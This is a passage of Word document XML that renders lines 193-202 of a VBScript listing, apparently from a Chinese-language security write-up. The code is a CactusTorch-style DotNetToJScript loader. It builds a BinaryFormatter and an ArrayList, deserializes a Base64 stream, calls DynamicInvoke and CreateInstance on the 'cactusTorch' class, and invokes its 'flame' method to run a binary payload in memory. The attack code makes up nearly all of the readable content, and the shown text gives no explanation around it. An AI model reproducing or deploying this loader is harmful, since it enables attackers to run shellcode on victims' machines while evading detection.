        <w:t>"bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="354" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="7025" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>entry_class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cactusTorch"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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>194</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>195</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>196</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set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404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=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CreateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"System.Runtime.Serialization.Formatters.Binary.BinaryForma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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tter"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>197</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CreateObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"System.Collections.ArrayList"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="6921" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>198</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Add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404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SurrogateSelector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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deserialize_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Base64ToStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DynamicInvoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ToArray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CreateInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>entry_class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> 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o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>flame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
